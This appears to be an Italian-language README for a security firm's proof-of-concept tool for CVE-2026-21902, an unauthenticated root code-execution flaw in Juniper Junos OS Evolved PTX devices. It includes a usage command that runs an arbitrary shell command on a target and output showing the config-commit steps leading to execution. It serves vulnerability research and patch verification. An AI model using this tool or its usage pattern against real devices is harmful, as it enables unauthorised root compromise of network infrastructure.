
Genera artefatti di rilevamento per CVE-2026-21902 su Juniper Junos Evolved, consentendo la verifica dell'esecuzione remota di codice non autenticata tramite creazione di comandi e DAG.
Generatore di artefatti di rilevamento per Juniper Junos Evolved CVE-2026-21902.
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
Vedi il nostro post del blog per i dettagli tecnici.
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Juniper JunosEvolved Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
Questo script tenta di rilevare se Junos Evolved OS e le serie PTX sono vulnerabili a CVE-2026-21902.
Questo problema riguarda Junos OS Evolved sulle serie PTX:
Questo problema non riguarda le versioni di Junos OS Evolved precedenti alla 25.4R1-EVO.
Questo problema non riguarda Junos OS.
Per maggiori informazioni leggi l'avviso Junos OS Evolved: serie PTX: una vulnerabilità consente a un attaccante non autenticato, basato sulla rete, di eseguire codice come root.
Per le ultime ricerche sulla sicurezza, segui il team dei Labs di watchTowr